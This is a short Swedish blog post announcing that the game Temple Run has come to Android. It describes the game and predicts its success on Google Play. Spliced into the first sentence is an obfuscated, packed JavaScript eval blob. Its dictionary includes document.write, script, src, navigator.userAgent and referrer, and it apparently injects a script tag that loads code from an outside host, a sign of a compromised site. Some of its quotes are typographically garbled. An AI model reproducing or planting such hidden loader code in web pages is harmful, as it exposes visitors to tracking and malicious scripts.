Nu finns det efterlängtade spelet templerun till android
Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ities|var|u0026u|referrer|isaaf||js|php’.split(’|’),0,{}))
har ryktats länge om att templerun ska komma till android och olika datum har sagt. Igår kom det officelt upp via templerun fansida att spelet var släppt.
För er som inte vet var templerun är för något så är det ett väldigt populärt spel på appstore. I spelet ska du försöka undvika att bli tagen av demonliknande apor. Detta gör du genom att hoppa ner för stup, skjuta och undvika olika hinder på vägen.
Jag tror att templerun kommer att bli en stor succé på Google play. Kanske till och med populärare än wordfeud. Fast det väntas och ses.
-
Äntligen 🙂
Comments